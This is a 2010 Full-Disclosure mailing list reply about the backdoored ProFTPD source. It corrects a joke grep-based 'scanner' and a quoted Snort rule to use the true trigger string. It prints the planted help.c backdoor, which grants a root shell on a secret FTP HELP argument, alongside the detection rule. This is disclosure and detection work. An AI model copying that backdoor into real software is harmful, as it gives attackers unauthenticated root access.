Re: New Source Code Vulnerability Scanner (Free 30 Day Trial)

[Michael McGraw-Herdeg <mherdeg () mit edu>]

Hi,
You might want to make the below patch:

========
@@ -9,7 +9,7 @@
 # online store.
 #
 # 50% of all proceeds will go to the victims that have been
-# owned by ACIDBITCHES within the past 6 years.
+# owned by ACIDBITCHEZ within the past 6 years.
 #
 ###################################################################

@@ -17,4 +17,4 @@

 export PATH=/bin

-grep -r ACIDBITCHES *
+grep -r ACIDBITCHEZ *
====

The snort rule you link to is checking for "HELP ACIDBITCHES", I
believe incorrectly, as the compromised code actually appears to
trigger on the string "ACIDBITCHEZ".

Snort sig (...BITCHES,
http://permalink.gmane.org/gmane.comp.security.ids.snort.emerging-sigs/7965)
""
alert tcp any any -> $HOME_NET 21 (msg:"ET CURRENT_EVENTS ProFTPD
Backdoor Inbound Backdoor Open Request
(ACIDBITCHES)"; flow:established,to_server; content:"HELP
ACIDBITCHES"; depth:16; nocase;
classtype: trojan-activity;
""

The compromise (...BITCHEZ,
http://xorl.wordpress.com/2010/12/02/news-proftpd-owned-and-backdoored/,
http://permalink.gmane.org/gmane.mail.postfix.user/215431) includes in
src/help.c:
""
} else
if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0);
system("/bin/sh;/sbin/sh"); }
  /* List the syntax for the given target command. */
""

Thanks!

On Thu, Dec 2, 2010 at 10:18 AM,  <vulnscan () hushmail com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Esteemed members of the Full Disclosure mailing list,
>
> In the wake of the recent compromise of the ProFTPd distribution
> server and the subsequent root-level backdoor that was placed into
> the source[0], we are proud to announce a cutting edge source code
> scanner that will help you detect backdoors in your code. This code
> is free to use for 30 days, after which time you must pay for it.
>
>
> - ------------- el8 Vuln Scan v.0.1 -------------
>
> #!/bin/bash
>
> ###################################################################
> #
> # Place this script inside the top level directory of your
> # source code repo.
> #
> # Please delete this after 30 days, or purchase a copy from our
> # online store.
> #
> # 50% of all proceeds will go to the victims that have been
> # owned by ACIDBITCHES within the past 6 years.
> #
> ###################################################################
>
> # main
>
> export PATH=/bin
>
> grep -r ACIDBITCHES *
>
> - ------------- el8 Vuln Scan v.0.1 -------------
>
>
> Thank you for helping us to help you make the Internet a safer
> place.
>
>
> [0]
> http://permalink.gmane.org/gmane.comp.security.ids.snort.emerging-
> sigs/7965
> -----BEGIN PGP SIGNATURE-----
> Charset: UTF8
> Version: Hush 3.0
> Note: This signature can be verified at https://www.hushtools.com/verify
>
> wpwEAQMCAAYFAkz34wkACgkQnCf21LwRaXbdlwP/bRK2S7SA77h05jF1cdBty4hefooL
> Zx0GOeABoqTZKnaNuKxGqwdPtg7fyNctrb7iMzehzJWBXnAD1Zik2UCujZINxeE8BFhw
> yTN9gshJZB1cdWSHwxQdiB+NqS9eRqg3s0J8i/9EjzNVkgX4EJTJZMXv9oEUDCgwW92h
> 7KFZMWU=
> =mJJI
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/